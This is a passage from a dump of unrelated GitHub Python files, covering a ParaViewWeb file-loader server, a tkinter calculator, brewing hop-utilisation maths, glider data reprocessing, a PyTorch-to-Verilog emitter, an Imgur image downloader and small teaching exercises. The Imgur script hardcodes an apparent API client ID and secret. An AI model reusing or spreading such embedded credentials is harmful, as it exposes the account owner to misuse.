]:\n\n\n\n\n","repo_name":"yaozile123/Web-Crawling-and-Classification-of-Yelp-Reviews","sub_path":"whole_code.py","file_name":"whole_code.py","file_ext":"py","file_size_in_byte":4079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} 
+{"seq_id":"73289964088","text":"r\"\"\"\n This module is a ParaViewWeb server application.\n The following command line illustrate how to use it::\n\n $ pvpython .../pv_web_file_loader.py --data-dir /.../path-to-your-data-directory --file-to-load /.../any-vtk-friendly-file.vtk\n\n --file-to-load is optional and allow the user to pre-load a given dataset.\n\n --data-dir is used to list that directory on the server and let the client\n choose a file to load.\n\n --ds-host None\n Host name where pvserver has been started\n\n --ds-port 11111\n Port number to use to connect to pvserver\n\n --rs-host None\n Host name where renderserver has been started\n\n --rs-port 22222\n Port number to use to connect to the renderserver\n\n Any ParaViewWeb executable script come with a set of standard arguments that\n can be overriden if need be::\n\n --port 8080\n Port number on which the HTTP server will listen to.\n\n --content /path-to-web-content/\n Directory that you want to server as static web content.\n By default, this variable is empty which mean that we rely on another server\n to deliver the static content and the current process only focus on the\n WebSocket connectivity of clients.\n\n --authKey vtkweb-secret\n Secret key that should be provided by the client to allow it to make any\n WebSocket communication. The client will assume if none is given that the\n server expect \"vtkweb-secret\" as secret key.\n\"\"\"\n\n# import to process args\nimport sys\nimport os\n\n# import paraview modules.\nfrom paraview import simple\nfrom paraview.web import wamp as pv_wamp\nfrom paraview.web import protocols as pv_protocols\n\nfrom vtk.web import server\nfrom vtkWebCorePython import *\n\n# import annotations\nfrom autobahn.wamp import exportRpc\n\ntry:\n import argparse\nexcept ImportError:\n # since Python 2.6 and earlier don't have argparse, we simply provide\n # the source for the same as _argparse and we use it instead.\n import _argparse as argparse\n\n# =============================================================================\n# Create custom File Opener class to handle clients requests\n# =============================================================================\n\nclass _FileOpener(pv_wamp.PVServerProtocol):\n\n # Application configuration\n reader = None\n fileToLoad = None\n pathToList = \".\"\n view = None\n authKey = \"vtkweb-secret\"\n dsHost = None\n dsPort = 11111\n rsHost = None\n rsPort = 11111\n\n def initialize(self):\n # Bring used components\n self.registerVtkWebProtocol(pv_protocols.ParaViewWebStartupRemoteConnection(_FileOpener.dsHost, _FileOpener.dsPort, _FileOpener.rsHost, _FileOpener.rsPort))\n self.registerVtkWebProtocol(pv_protocols.ParaViewWebFileListing(_FileOpener.pathToList, \"Home\"))\n self.registerVtkWebProtocol(pv_protocols.ParaViewWebMouseHandler())\n self.registerVtkWebProtocol(pv_protocols.ParaViewWebViewPort())\n self.registerVtkWebProtocol(pv_protocols.ParaViewWebViewPortImageDelivery())\n self.registerVtkWebProtocol(pv_protocols.ParaViewWebViewPortGeometryDelivery())\n self.registerVtkWebProtocol(pv_protocols.ParaViewWebTimeHandler())\n\n # Update authentication key to use\n self.updateSecret(_FileOpener.authKey)\n\n # Create default pipeline\n if _FileOpener.fileToLoad:\n _FileOpener.reader = simple.OpenDataFile(_FileOpener.fileToLoad)\n simple.Show()\n\n _FileOpener.view = simple.Render()\n _FileOpener.view.ViewSize = [800,800]\n # If this is running on a Mac DO NOT use Offscreen Rendering\n #view.UseOffscreenRendering = 1\n simple.ResetCamera()\n 
else:\n            _FileOpener.view = simple.GetRenderView()\n            simple.Render()\n            _FileOpener.view.ViewSize = [800,800]\n        simple.SetActiveView(_FileOpener.view)\n\n    def openFile(self, files):\n        id = \"\"\n        if _FileOpener.reader:\n            try:\n                simple.Delete(_FileOpener.reader)\n            except:\n                _FileOpener.reader = None\n        try:\n            _FileOpener.reader = simple.OpenDataFile(files)\n            simple.Show()\n            simple.Render()\n            simple.ResetCamera()\n            id = _FileOpener.reader.GetGlobalIDAsString()\n        except:\n            _FileOpener.reader = None\n        return id\n\n    @exportRpc(\"openFileFromPath\")\n    def openFileFromPath(self, files):\n        fileToLoad = []\n        if type(files) == list:\n            for file in files:\n                fileToLoad.append(os.path.join(_FileOpener.pathToList, file))\n        else:\n            fileToLoad.append(os.path.join(_FileOpener.pathToList, files))\n        return self.openFile(fileToLoad)\n\n# =============================================================================\n# Main: Parse args and start server\n# =============================================================================\n\nif __name__ == \"__main__\":\n    # Create argument parser\n    parser = argparse.ArgumentParser(description=\"ParaView/Web file loader web-application\")\n\n    # Add default arguments\n    server.add_arguments(parser)\n\n    # Add local arguments\n    parser.add_argument(\"--file-to-load\", help=\"relative file path to load based on --data-dir argument\", dest=\"data\")\n    parser.add_argument(\"--data-dir\", default=os.getcwd(), help=\"Base path directory\", dest=\"path\")\n    parser.add_argument(\"--ds-host\", default=None, help=\"Hostname to connect to for DataServer\", dest=\"dsHost\")\n    parser.add_argument(\"--ds-port\", default=11111, type=int, help=\"Port number to connect to for DataServer\", dest=\"dsPort\")\n    parser.add_argument(\"--rs-host\", default=None, help=\"Hostname to connect to for RenderServer\", dest=\"rsHost\")\n    parser.add_argument(\"--rs-port\", default=11111, type=int, help=\"Port number to connect to for RenderServer\", dest=\"rsPort\")\n\n\n    # Extract arguments\n    args = parser.parse_args()\n\n    # Configure our current application\n    _FileOpener.fileToLoad = args.data\n    _FileOpener.pathToList = args.path\n    _FileOpener.authKey = args.authKey\n    _FileOpener.dsHost = args.dsHost\n    _FileOpener.dsPort = args.dsPort\n    _FileOpener.rsHost = args.rsHost\n    _FileOpener.rsPort = args.rsPort\n\n    # Start server\n    server.start_webserver(options=args, protocol=_FileOpener)\n","repo_name":"leemargetts/ParaFEM","sub_path":"demo-installer-win/vendor/ParaView 4.1.0/lib/paraview-4.1/site-packages/paraview/web/pv_web_file_loader.py","file_name":"pv_web_file_loader.py","file_ext":"py","file_size_in_byte":6530,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"77"} +{"seq_id":"7719239486","text":"import math\nfrom tkinter import *\n#from tkinter import ttk\nimport tkinter.font as font\nroot=Tk()\nroot.title(\"Calculator\")\nroot.geometry(\"570x600\")\nroot.resizable(False,False)\nroot.configure(bg='#17161b') \n\n#e=Entry(root, width=70, bg=\"light grey\", fg=\"black\")\n\n\ne=Entry(root,width=25,font=(\"arial\",30))\ne.grid(row=0, column=0, columnspan=4, padx=10, pady=25)\n#label.pack()\n\nbuttonFont = font.Font(size=20,family='arial',weight='bold')\n\n#e.insert(0,\"Enter The Number: \")\n\n#equation=\"\"\n\ndef click (number):\n    #global equation\n    #equation+=number\n    num1=e.get()\n    e.delete(0,END)\n    e.insert(0,str(num1)+str(number))\n    \n    # hello=\"Hello \"+e.get()\n    # label=Label(root,text=hello)\n    # label.pack()\ndef clear():\n    e.delete(0,END)\n    \ndef 
add():\n one_num=e.get()\n global f_num\n global math\n math=\"addition\"\n f_num=int(one_num)\n e.delete(0,END)\n\ndef div():\n one_num=e.get()\n global f_num\n global math\n math=\"division\"\n f_num=int(one_num)\n e.delete(0,END)\n\ndef sub():\n one_num=e.get()\n global f_num\n global math\n math=\"subtraction\"\n f_num=int(one_num)\n e.delete(0,END)\n \ndef mul():\n one_num=e.get()\n global f_num\n global math\n math=\"multiplication\"\n f_num=int(one_num)\n e.delete(0,END)\n \ndef percent():\n one_num=e.get()\n global f_num\n global math\n math=\"percent\"\n f_num=int(one_num)\n e.delete(0,END)\n \ndef squ():\n one_num=e.get()\n global f_num\n global math\n math=\"squ\"\n f_num=int(one_num)\n e.delete(0,END)\n \ndef expo():\n one_num=e.get()\n global f_num\n global math\n math=\"expo\"\n f_num=int(one_num)\n e.delete(0,END)\n \n \ndef equal():\n \n if math==\"addition\":\n sc_num=e.get()\n e.delete(0,END)\n e.insert(0,f_num+int(sc_num))\n if math==\"subtraction\":\n sc_num=e.get()\n e.delete(0,END)\n e.insert(0,f_num-int(sc_num))\n if math==\"multiplication\":\n sc_num=e.get()\n e.delete(0,END)\n e.insert(0,f_num*int(sc_num))\n if math==\"division\":\n sc_num=e.get()\n e.delete(0,END)\n e.insert(0,f_num/int(sc_num))\n if math==\"percent\":\n sc_num=e.get()\n e.delete(0,END)\n e.insert(0,(int(sc_num)*(f_num/100)))\n if math==\"squ\":\n #sc_num=e.get()\n #e.delete(0,END)\n e.insert(0,(f_num*f_num))\n if math==\"expo\":\n sc_num=e.get()\n e.delete(0,END)\n e.insert(0,(f_num**int(sc_num)))\n \n\n \n \nbuttonclear=Button(root, text=\"C\", bg=\"#3697f5\",fg=\"#fff\",font=buttonFont,bd=1,padx=45,pady=20,command=clear) \nbuttonper =Button(root, text=\"%\", bg=\"#2a2d36\",fg=\"#fff\", font= buttonFont, padx=40,pady=20,command=percent)\nbuttonmul=Button(root, text=\"X\", bg=\"#2a2d36\",fg=\"#fff\",font= buttonFont,padx=45,bd=1,pady=20,command=mul)\nbuttondiv =Button(root, text=\"/\", bg=\"#2a2d36\",fg=\"#fff\",font= buttonFont,bd=1, padx=47,pady=20,command=div)\n\nbutton7=Button(root, text=\"7\", bg=\"#2a2d36\",fg=\"#fff\",font=buttonFont,bd=1,padx=45,pady=20,command=lambda: click(7))\nbutton8=Button(root, text=\"8\", bg=\"#2a2d36\",fg=\"#fff\",font=buttonFont,bd=1,padx=45,pady=20,command=lambda: click(8))\nbutton9=Button(root, text=\"9\", bg=\"#2a2d36\",fg=\"#fff\",font=buttonFont,bd=1,padx=45,pady=20,command=lambda: click(9))\nbuttonsub=Button(root, text=\"-\",bg=\"#2a2d36\",fg=\"#fff\",font=buttonFont,bd=1,padx=49,pady=20,command=sub)\n\n\nbutton4=Button(root, text=\"4\", bg=\"#2a2d36\",fg=\"#fff\",font=buttonFont,bd=1,padx=45,pady=20,command=lambda: click(4))\nbutton5=Button(root, text=\"5\", bg=\"#2a2d36\",fg=\"#fff\",font=buttonFont,bd=1,padx=45,pady=20,command=lambda: click(5))\nbutton6=Button(root, text=\"6\", bg=\"#2a2d36\",fg=\"#fff\",font=buttonFont,bd=1,padx=45,pady=20,command=lambda: click(6))\nbuttonadd=Button(root, text=\"+\",bg=\"#2a2d36\",fg=\"#fff\",font=buttonFont,bd=1,padx=45,pady=20,command=add)\n\n\n\nbutton1=Button(root, text=\"1\", bg=\"#2a2d36\",fg=\"#fff\",font=buttonFont,bd=1,padx=45,pady=20,command=lambda: click(1))\nbutton2=Button(root, text=\"2\", bg=\"#2a2d36\",fg=\"#fff\",font=buttonFont,bd=1,padx=45,pady=20,command=lambda: click(2))\nbutton3=Button(root, text=\"3\", bg=\"#2a2d36\",fg=\"#fff\",font=buttonFont,bd=1,padx=45,pady=20,command=lambda: click(3))\n\n\n\nbutton0=Button(root, text=\"0\", bg=\"#2a2d36\",fg=\"#fff\",font=buttonFont,bd=1,padx=45,pady=20,command=lambda: click(0))\nbuttonsqu=Button(root, text=\"x^2\", 
bg=\"#2a2d36\",fg=\"#fff\",font=buttonFont,bd=1,padx=30,pady=20,command=squ)\nbuttonexpo=Button(root, text=\"x^y\",bg=\"#2a2d36\",fg=\"#fff\",font=buttonFont,bd=1,padx=30,pady=20,command=expo)\nbuttonequal=Button(root, text=\"=\",bg=\"#fe9037\",fg=\"#fff\",font=buttonFont,bd=1,padx=45,pady=70,command=equal)\n \n\n\n\nbuttondiv.grid(row=1,column=1)\nbuttonmul.grid(row=1,column=2)\nbuttonper.grid(row=1,column=3)\nbuttonclear.grid(row=1,column=0)\n\nbutton7.grid(row=2,column=0)\nbutton8.grid(row=2,column=1)\nbutton9.grid(row=2,column=2)\nbuttonsub.grid(row=2,column=3)\n\nbutton4.grid(row=3,column=0)\nbutton5.grid(row=3,column=1)\nbutton6.grid(row=3,column=2)\nbuttonadd.grid(row=3,column=3)\n\nbutton1.grid(row=4,column=0)\nbutton2.grid(row=4,column=1)\nbutton3.grid(row=4,column=2)\n\nbutton0.grid(row=5,column=1)\nbuttonsqu.grid(row=5,column=2)\nbuttonexpo.grid(row=5,column=0)\n\n\nbuttonequal.grid(row=4,column=3,rowspan=2)\n \n \nroot.mainloop()\n","repo_name":"zilladeepak/GUICalculator","sub_path":"Calculator.py","file_name":"Calculator.py","file_ext":"py","file_size_in_byte":5260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29337456819","text":"#Conversión de Decimal a Binario\ndef binario(numero):\n Binario = \" \"\n \n while numero // 2 != 0:\n Binario = str(numero%2) + Binario \n numero = numero // 2\n \n return str(numero) + Binario\n\nx = float(input(\"ingrese un numero decimal: \"))\nresultado = binario(int(x))\n\nprint(\"resultado=\"+ resultado)","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej4/hito1_ej4_9846d17f6f661df48283dab7735a6e79.py","file_name":"hito1_ej4_9846d17f6f661df48283dab7735a6e79.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42572221841","text":"\"\"\"\nMathematics for hop-related calculations for recipes/plotting.\nAbbreviations:\n alpha acid: AA\n specific gravity: G\n original gravity: OG\n temperature: T\n time: t (minutes)\n\"\"\"\nimport numpy as np\nfrom MegaBeer.science import reaction\nfrom MegaBeer.science.heat import NewtonCooling\n# from scipy.interpolate import RectBivariateSpline as rbs\nfrom scipy.integrate import quad, odeint\nfrom scipy.interpolate import interp1d\n\n\nclass MaloShell:\n \"\"\" Container class for Malowicki & Shellhammer 2005 function constructors.\n Note: c = [c1, c2, c3] = [AA, iso-AA, degradation products]\n \"\"\"\n @staticmethod\n def maloshell_constant_temp(k1, k2):\n \"\"\" AA isomizeration rates using the Malowicki & Shellhammer 2005\n model for a fixed gravity. pH fixed to 5.2. 
class MaloShell:\n    \"\"\" Container class for Malowicki & Shellhammer 2005 function constructors.\n        Note: c = [c1, c2, c3] = [AA, iso-AA, degradation products]\n    \"\"\"\n    @staticmethod\n    def maloshell_constant_temp(k1, k2):\n        \"\"\" AA isomerization rates using the Malowicki & Shellhammer 2005\n            model for a fixed gravity. pH fixed to 5.2. Assumes k1 != k2.\n\n            For a fixed temperature T, the total isomerization rate is a\n            function of time: c_iso(t) = const * f(t)\n        Args:\n            k1 (float): Isomerization reaction rate\n            k2 (float): Iso-AA degradation rate\n        \n        Returns:\n            numpy.ndarray: 3d vector of fractional concentration functions \n        \"\"\"\n        c1 = lambda t: k1 * np.exp(-k1 * t)\n        c2 = lambda t: k1 / (k2 - k1) * (np.exp(-k1 * t) - np.exp(-k2 * t))\n        c3 = lambda t: k2 * np.exp(-k2 * t)\n        return np.asarray([c1, c2, c3])\n\n    @staticmethod\n    def maloshell_boil_temp():\n        \"\"\" Malowicki & Shellhammer 2005 model but with fixed boiling temperature.\n            Refer to table 3 in paper: k1 = 0.01141, k2 = 0.00263 for T=100.\n        Args:\n            t (float or numpy.ndarray): Boil time.\n        \n        Returns:\n            float or numpy.ndarray: time component of utilization fraction\n        \"\"\"\n        k1_boil = 0.01141\n        k2_boil = 0.00263\n        return MaloShell.maloshell_constant_temp(k1_boil, k2_boil)\n\n    @staticmethod\n    def maloshell_cooling(A1, A2, Ea_1, Ea_2, c0, tau=132.5, T_room=21.1):\n        \"\"\" Approximates the isomerization rate during cooling, and assumes no\n            significant isomerization after one e-fold (tau minutes) has passed.\n            Default tau is taken from cooling one gallon of water\n            in an 8 quart stainless steel stock pot with a steel lid on.\n        Args:\n            A1 (float): Exponential prefactor for k1.\n            A2 (float): Exponential prefactor for k2.\n            Ea_1 (float): Activation energy for reaction 1.\n            Ea_2 (float): Activation energy for reaction 2.\n            c0 (np.ndarray): Initial condition vector.\n            tau (float): Cooling rate time scale in minutes. Default is 132.5 min.\n            T_room (float): Room temperature water is cooling in. Default is 21.1 C (70 F).\n        \n        Returns:\n            function: Utilization function vector for c1, c2, c3\n        \"\"\"\n        # Make sure c0 is an array:\n        c0 = np.asarray(c0)\n\n        # Create time array with spacings of one minute.\n        t_arr = np.linspace(0., tau, int(np.ceil(tau)) + 1)\n\n        # Grab the Newton Cooling function T(t) with T0=T_room and Ti=100 C\n        temp_func = NewtonCooling.T(T_room, 100., tau)\n\n        # Get rate functions:\n        k1_func = lambda t: reaction.arrhenius(Ea_1, A1)(temp_func(t))\n        k2_func = lambda t: reaction.arrhenius(Ea_2, A2)(temp_func(t))\n\n        def dcdt(c, t):\n            # Internal function to solve ODE. c = np.array([c1, c2, c3])\n            M = np.zeros((3, 3))\n            M[0, 0] = -reaction.RateEquations.dkn_dt(1, k1_func(t))(t)\n            M[1, 0] = reaction.RateEquations.dkn_dt(1, k1_func(t))(t)\n            M[1, 1] = -reaction.RateEquations.dkn_dt(1, k2_func(t))(t)\n            M[2, 1] = reaction.RateEquations.dkn_dt(1, k2_func(t))(t)\n\n            # print(M)\n            return np.dot(M, c)\n\n        c = odeint(dcdt, c0, t_arr)\n\n        # Extrapolation fill values for each component of vector c.\n        ext = [(c[0, i], c[-1, i]) for i in range(3)]\n\n        # Linear interpolation for each vector component. Assumes no utilization below t=0\n        # and fixed utilization above the t value given as input.\n        return np.asarray(\n            [interp1d(t_arr, c[:, i], fill_value=ext[i]) for i in range(3)]\n        )\n\n\n
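# Added usage sketch (not from the original module; the 60-minute boil time is an\n# arbitrary illustration): evaluating the boil-temperature model at t minutes.\n#\n#     c1, c2, c3 = MaloShell.maloshell_boil_temp()\n#     iso_fraction_60min = c2(60.0)   # iso-AA fraction after a 60 min boil\n#\n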
class mIBU:\n    \"\"\" Alchemy Overlords modified Tinseth utilization model accounting for cooling \n        of wort after flameout. Note that the piecewise nature of these math functions\n        complicated a functional approach, hence the OOP approach here.\n    Args:\n        max_u (float): Maximum utilization constant. Default is 0.241.\n        r (float): Rate constant of growth. Default is 0.04.\n        surface_area (float): Exposed wort surface area in square \n            centimeters.\n        open_area (float): Size of opening of pot in square centimeters.\n        volume (float): Volume of wort in liters.\n    \"\"\"\n    def __init__(\n        self, surface_area, open_area, volume, max_u=0.241, r=0.04\n    ):\n        self.surface_area = surface_area\n        self.open_area = open_area\n        self.volume = volume\n        self.b = mIBU.calculate_b(surface_area, open_area, volume)\n        self.max_u = max_u\n        self.r = r\n\n    @staticmethod\n    def calculate_b(surface_area, open_area, volume):\n        \"\"\" Timescale (tau equivalent) from Alchemy Overlord.\n        Args:\n            surface_area (float): Exposed wort surface area in square \n                centimeters.\n            open_area (float): Size of opening of pot in square centimeters.\n            volume (float): Volume of wort in liters.\n        \n        Results:\n            float: b\n        \"\"\"\n        eff_area = np.sqrt(surface_area * open_area)\n        return 2.925e-4 * eff_area / volume + 5.38e-3\n\n    def change_b(self, b):\n        \"\"\" Convenience method to update the b attribute\n        Args:\n            b (float): New b value\n        \"\"\"\n        if type(b) is float:\n            self.b = b\n            return True\n        \n        else:\n            raise ValueError(\"b must be a float\")\n\n    def mIBU(self, t, t_boil, t_cool):\n        \"\"\" Modified Tinseth from https://alchemyoverlord.wordpress.com/\n        Args:\n            t (float or numpy.ndarray): Iso time. Total time hop addition(s)\n                is(are) in the wort.\n            t_boil (float): Boil time.\n            t_cool (float): Cooling time.\n\n        Results:\n            float or numpy.ndarray: Time component of utilization fraction.\n        \"\"\"\n\n        # Convert float to array:\n        t_arr = np.asarray(t)\n\n        # Mask that is true if t >= t_cool, false otherwise:\n        t_mask = t_arr >= t_cool\n\n        # calculate utilization at constant temperature:\n        boil_util = np.where(\n            t_mask, TinsethTime.tinseth(max_u=self.max_u, r=self.r)(t_arr), 0.\n        )\n\n        # Cooling rate to integrate\n        cool_rate = lambda x: TinsethTime.tinseth_rate(max_u=self.max_u, r=self.r)(x) * \\\n            self.mIBU_rate_correction(x)\n        \n        # Integrate to calculate cooling utilization; quad returns an (integral, error)\n        # pair, so only the first element is kept. Note that t_cool - t\n        # to t_cool is the total cooling time as t is the total time in the wort:\n        cool_util = np.where(\n            t_mask,\n            quad(cool_rate, 0., t_cool)[0], quad(cool_rate, t_cool - t, t_cool)[0]\n        )\n\n        return boil_util + cool_util\n    \n    def mIBU_rate_correction(self, t):\n        \"\"\" mIBU relative rate differential correction factor.\n        Args:\n            t (float or numpy.ndarray): time\n        \n        Returns:\n            float or numpy.ndarray: relative rate correction\n        \"\"\"\n        # Constants for mIBU model:\n        c1 = 2.39e11\n        c2 = 9773.  # Units of E_activation / R\n        c3 = 53.7\n        c4 = 319.95\n\n        return c1 * np.exp(-c2 / (c3 * np.exp(-self.b * (t)) + c4))\n\nclass TinsethTime():\n    \"\"\" Container class for Tinseth temporal component calculations\n    \"\"\"\n    @staticmethod\n    def tinseth(max_u=0.241, r=0.04):\n        \"\"\" Temporal component of Tinseth model. Max_u and r taken from Palmer.\n            Note: 0.241 = 1 / 4.15.\n        Args:\n            max_u (float): Maximum utilization constant. Default is 0.241.\n            r (float): Rate constant of growth. 
Default is 0.04.\n\n Results:\n function: Time component of utilization function derivative.\n \"\"\"\n return lambda t: max_u * r * np.exp(-r * t)\n\n","repo_name":"jhand1993/MegaBeer","sub_path":"MegaBeer/calculation/hops/iso_time.py","file_name":"iso_time.py","file_ext":"py","file_size_in_byte":8864,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"33096836676","text":"from pysimenv.common.model import SignalGenerator, Integrator, Sequential\nfrom pysimenv.core.simulator import Simulator\n\n\ndef main():\n signal_generator = SignalGenerator(\n shaping_fun=lambda t: 1./(1. + t)**2\n )\n integrator = Integrator([0.])\n model = Sequential([signal_generator, integrator])\n simulator = Simulator(model)\n simulator.propagate(0.01, 10., True)\n integrator.default_plot(show=True)\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n","repo_name":"minii93/pysimenv","sub_path":"pysimenv/test/test_integrator.py","file_name":"test_integrator.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"18166249856","text":"import datetime\nimport pathlib\nimport pandas as pd\nimport numpy as np\nimport logging\nimport types\nfrom pathlib import Path\nfrom pyglider_single_mission import process\n_log = logging.getLogger(__name__)\n\n\ndef adcp_status(glider, mission):\n pld_file = list(Path(f\"/data/data_raw/complete_mission/SEA{glider}/M{mission}/\").glob(\"*pld1.raw.*gz\"))[0]\n df = pd.read_csv(pld_file, sep=\";\")\n if \"AD2CP_PRESSURE\" not in list(df):\n _log.info(\"no adcp data expected\")\n return True\n if Path(f\"/data/data_raw/complete_mission/SEA{glider}/M{mission}/ADCP/sea{glider}_m{mission}_ad2cp.nc\").exists():\n _log.info(\"adcp data file found\")\n return True\n else:\n _log.warning(\"did not find expected ADCP file\")\n return False\n\n\ndef main():\n logf = f'/data/log/new_complete_mission.log'\n logging.basicConfig(filename=logf,\n filemode='a',\n format='%(asctime)s %(levelname)-8s %(message)s',\n level=logging.INFO,\n datefmt='%Y-%m-%d %H:%M:%S')\n _log.info(\"Check for new missions\")\n df_reprocess = pd.read_csv('/home/pipeline/reprocess.csv', parse_dates=[\"proc_time\"])\n df_reprocess.sort_values(\"proc_time\", inplace=True)\n _log.info(f\"start length {len(df_reprocess)}\")\n glider_paths = list(pathlib.Path(\"/data/data_raw/complete_mission\").glob(\"SEA*\"))\n glider_paths_good = []\n for path in glider_paths:\n if \"SEA57\" in str(path):\n continue\n mission_paths = path.glob(\"M*\")\n\n glider_paths_good.append(mission_paths)\n glider_paths_good = [item for sublist in glider_paths_good for item in sublist]\n if len(glider_paths_good) == len(df_reprocess):\n _log.info(\"No new missions to process\")\n return\n for mission_path in glider_paths_good:\n glider = int(mission_path.parts[-2][3:])\n mission = int(mission_path.parts[-1][1:])\n a = [np.logical_and(df_reprocess.glider == glider, df_reprocess.mission == mission)]\n if not sum(sum(a)):\n _log.warning(f\"new mission {mission_path}\")\n if not adcp_status(glider, mission):\n continue\n args = types.SimpleNamespace()\n args.glider = glider\n args.mission = mission\n args.kind = \"raw\"\n process(args)\n nc_file = list((pathlib.Path(f\"/data/data_l0_pyglider/complete_mission/SEA{glider}/M{mission}/timeseries\")).glob('*.nc'))[0]\n nc_time = nc_file.lstat().st_mtime\n nc_time = datetime.datetime.fromtimestamp(nc_time)\n new_row = pd.DataFrame({\"glider\": glider, 
\"mission\": mission,\n \"proc_time\": nc_time, \"duration\": datetime.timedelta(minutes=20)},\n index=[len(df_reprocess)])\n df_reprocess = pd.concat((df_reprocess, new_row))\n _log.info(f\"end length {len(df_reprocess)}\")\n df_reprocess[\"gm\"] = df_reprocess.glider * 10000 + df_reprocess.mission\n df_reprocess = df_reprocess.groupby(\"gm\").first()\n df_reprocess.sort_values(\"proc_time\", inplace=True)\n\n\nif __name__ == '__main__':\n main()\n _log.info(\"Complete\")\n","repo_name":"voto-ocean-knowledge/utility_scripts","sub_path":"new_complete_missions.py","file_name":"new_complete_missions.py","file_ext":"py","file_size_in_byte":3202,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"38213875661","text":"from torch import nn\n\nimport layers\nfrom constants import test_bench_template\n\n\nclass Model:\n def __init__(self, model: nn.Sequential):\n self.model = model\n self.layers = []\n\n def __str__(self):\n return '\\n'.join(str(layer) for layer in self.layers)\n\n def parse_layers(self):\n for i, layer in enumerate(self.model):\n if isinstance(layer, nn.Linear):\n self.layers.append(layers.Linear.layer_from(layer, i))\n elif isinstance(layer, nn.ReLU):\n self.layers.append(layers.ReLU(self.model[i - 1].out_features, i))\n else:\n raise ValueError(f'Unknown layer type {layer}')\n\n def emit(self):\n out = [\"`timescale 1ns / 1ps\"]\n\n top = [\n \"module top(in, out);\",\n f\" input [{self.layers[0].shape[0] -1}:0] in;\",\n f\" output [{self.layers[-1].shape[-1] -1}:0] out;\\n\"\n ]\n\n for i, layer in enumerate(self.layers):\n out.append(layer.emit())\n top.append(f\" wire [{layer.shape[-1] - 1}:0] layer_{i}_out;\")\n\n if i == 0:\n top.append(f\" {layer.name} layer_{i}(in, layer_{i}_out);\")\n else:\n top.append(f\" {layer.name} layer_{i}(layer_{i - 1}_out, layer_{i}_out);\")\n\n top.append(f\"\\n assign out = layer_{len(self.layers) - 1}_out;\")\n top.append(\"endmodule\")\n\n out.append('\\n'.join(top))\n\n return '\\n'.join(out)\n\n def emit_test_bench(self):\n return test_bench_template.format(input_length=2 ** self.layers[0].shape[0])\n\n\ndef test():\n simple_model = nn.Sequential(\n nn.Linear(2, 2),\n nn.ReLU(),\n nn.Linear(2, 2),\n nn.ReLU(),\n nn.Linear(2, 1),\n )\n\n model = Model(simple_model)\n model.parse_layers()\n\n print(model)\n code = model.emit()\n\n with open('test.v', 'w') as f:\n f.write(code)\n\n with open('test_tb.v', 'w') as f:\n f.write(model.emit_test_bench())\n\n\nif __name__ == '__main__':\n test()\n","repo_name":"rohittp0/chipon","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"12691188059","text":"from imgurpython import ImgurClient\nimport urllib.request\nimport timeit\nfrom concurrent.futures import ThreadPoolExecutor\nfrom multiprocessing import Pool\n\ndef descarga_url_img(link):\n #print(link)\n # Con esto ya podemos obtener el corte de la url imagen\n nombre_img = link.split(\"/\")[3]\n formato_img = nombre_img.split(\".\")[1]\n nombre_img = nombre_img.split(\".\")[0]\n print(nombre_img, formato_img)\n url_local = \"/Users/txpla/Desktop/Escuela/Concurrencia/Imagenes/{}.{}\" #es la ruta local, y cambiara de acuerdo al equipo\n #Guardar nne local las imagenes\n urllib.request.urlretrieve(link, url_local.format(nombre_img, formato_img))\n \ndef imagenes(lista,cliente):\n id_album = \"bUaCfoz\"\n imagenes = cliente.get_album_images(id_album)\n 
    for imagen in imagenes:\n        lista.append(imagen.link)  # list of image links\n\ndef cliente():\n    secreto_cliente = \"5f8c3cce299db5e26a2eb96b0b7809a82805c9ad\"\n    id_cliente = \"bfa0e227a1c5643\"\n    cliente = ImgurClient(id_cliente, secreto_cliente)  # Imgur API client\n    return cliente\n\ndef useThreadPoolExecutor():  # download with a pool of threads\n    # Consume the map and wait for shutdown; otherwise the timer stops\n    # before the downloads have actually finished.\n    with ThreadPoolExecutor(max_workers=len(lista)) as ejecucion:\n        list(ejecucion.map(descarga_url_img, lista))\n\ndef usePool():  # download with a pool of processes\n    with Pool(len(lista)) as ejecucion:\n        ejecucion.map(descarga_url_img, lista)\n\ndef useSincron():  # download one image at a time\n    for i in lista:\n        descarga_url_img(i)\n\nif __name__ == \"__main__\":\n    lista = []\n    client = cliente()\n    imagenes(lista, client)\n    print(\"Download time using the synchronous download: {}\".format(timeit.Timer(useSincron).timeit(number=1)))\n    print(\"Download time using ThreadPoolExecutor threads: {}\".format(timeit.Timer(useThreadPoolExecutor).timeit(number=1)))\n    print(\"Download time using multiprocessing Pool: {}\".format(timeit.Timer(usePool).timeit(number=1)))","repo_name":"193228/193228-Actividad-Imagenes","sub_path":"actividadDescargas.py","file_name":"actividadDescargas.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26946044014","text":"#\n# Coding Explosion!\n# 10-11-2021\n#\n# Elisabetta Siboni and Maurizio Conti\n# Servizio Marconi - USR-ER 2021\n#\nimport turtle\nprint(\"Draws parametric polygons\")\n\n# input parameters\nlati = 5\nlato = 80\n\nturtle.pendown()\n\n# repeats the instructions \"lati\" times\nfor x in range(lati):\n    angolo = 360/lati\n    turtle.forward(lato)\n    turtle.right(angolo)\n\n# question:\n# Are there any instructions here that waste energy?\n# What if we ran the body of the for loop 100 times... 
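\n#\n# (editor's note, not part of the original activity) One possible answer,\n# as a sketch: \"angolo = 360/lati\" does not depend on the loop variable,\n# so recomputing it on every pass wastes work; hoisting it above the loop\n# computes it once:\n#\n#     angolo = 360 / lati        # hoisted: computed once\n#     for x in range(lati):\n#         turtle.forward(lato)\n#         turtle.right(angolo)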
